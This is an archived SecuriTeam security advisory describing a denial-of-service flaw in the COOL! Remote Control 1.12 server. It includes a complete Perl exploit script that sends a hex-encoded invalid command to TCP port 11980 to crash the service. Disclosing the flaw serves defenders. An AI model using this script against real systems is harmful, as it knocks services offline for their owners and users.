[NT] COOL! Remote Control DoS

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  COOL! Remote Control DoS
------------------------------------------------------------------------


SUMMARY

" <http://www.yaosoft.com/pcremotecontrol/> COOL! Remote Control is an 
excellent remote computing system that is very easy to use. It can display 
remote a PC screen on your own PC IN REAL TIME and allow you to use a 
mouse or keyboard work on it."

Lack of proper packet validation allows attackers to crash COOL! Remote 
Control and cause a DoS.

DETAILS

Vulnerable Systems:
 * COOL! Remote Control 1.12

A denial of service condition has been disclosed in the COOL! Remote 
Control (server) component that could allow a remote attacker to crash the 
service by sending a malicious TCP packet on specific port.

Exploit:
#!usr/bin/perl
#
#      COOL! Command Execution DOS Exploit
# --------------------------------------------
#      Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.yaosoft.com
#
# * If Remote Control(Client application) is running then already 
connected to server,
#   this command exploit will made Remote Control as Client disconnected 
from server machine.
#   But if the Remote Control is not currently connected to Remote 
Server,then
#   by send specified command to Remote Server its allow the server 
crashed/closed
#


$ARGC=@ARGV;
if ($ARGC !=1) {
    print "Usage: $0 [host]\n";
    print "Exam: $0 127.0.0.1\n";
    print "\n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$popy = "\x31\x31\x39\x38\x30";

print "\n[+] Connect to host..\n";
$iaddr = inet_aton($remote) or die "[-] Error: $!";
$paddr = sockaddr_in($popy, $iaddr) or die "[-] Error: $!";
$proto = getprotobyname('tcp') or die "[-] Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[-] Error: $!";
connect(SOCK, $paddr) or die "[-] Error: $!";

print "[+] Connected\n";
print "[+] Send invalid command..\n";

$empty = "\x49\x4e\x46\x41\x4d\x4f\x55\x531".
"\x47\x52\x4f\x55\x50";

send(SOCK, $empty, 0) or die "[-] Cannot send query: $!";
sleep(2);
print "[+] DONE\n";
print "[+] Check if server crash!\n";
close(SOCK);
exit;

#EoF


ADDITIONAL INFORMATION

The information has been provided by  <mailto:basher13@xxxxxxxxxxxxx> Eric 
Basher.
The original article can be found at:  
<http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=90>
 
http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=90



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@xxxxxxxxxxxxxx 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@xxxxxxxxxxxxxx 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.